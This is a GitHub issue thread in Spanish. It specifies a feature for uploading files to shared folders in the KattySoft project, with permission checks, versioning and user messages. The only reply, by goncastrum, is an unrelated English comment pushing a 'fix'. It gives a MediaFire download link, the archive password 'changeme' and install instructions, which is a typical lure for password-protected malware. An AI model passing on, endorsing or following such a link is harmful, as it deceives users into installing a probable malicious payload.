### ISSUE TITLE
Función para subir archivos en carpetas compartidas

### ISSUE THREAD

**Issue by JosarDev** [JosarDev/KattySoft#1]
#### Historia de Usuario
Como usuario del sistema, necesito la capacidad de subir archivos a carpetas compartidas para colaborar eficientemente con otros usuarios en un entorno seguro y controlado.

#### Criterios de Aceptación:
- [x] Implementar la funcionalidad que permita a los usuarios subir archivos a carpetas compartidas.
- [x] Asegurar que solo los usuarios con los permisos adecuados puedan realizar la subida de archivos en estas carpetas.
- [x] Garantizar que los archivos subidos se mantengan organizados dentro de las carpetas correspondientes.
- [x] Asegurar la correcta gestión de versiones y estados de los archivos subidos (vigente/obsoleto).
- [x] Incluir mensajes de confirmación y error que informen al usuario sobre el estado de la subida.

#### Descripción
Se debe desarrollar una función dentro del sistema que permita a los usuarios subir archivos directamente en carpetas compartidas. Esta funcionalidad es esencial para mejorar la colaboración entre usuarios que trabajan en documentos conjuntos.

Detalles a implementar:
- **Permisos**: Verificar que solo los usuarios con permisos apropiados puedan subir archivos en carpetas compartidas.
- **Organización**: Los archivos subidos deben mantenerse correctamente organizados dentro de la estructura de carpetas compartidas.
- **Gestión de Estados**: Integrar la gestión de versiones y estados de los archivos para mantener un control adecuado.
- **Mensajes al Usuario**: Incluir mensajes de éxito o error que indiquen al usuario el resultado de la operación de subida.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
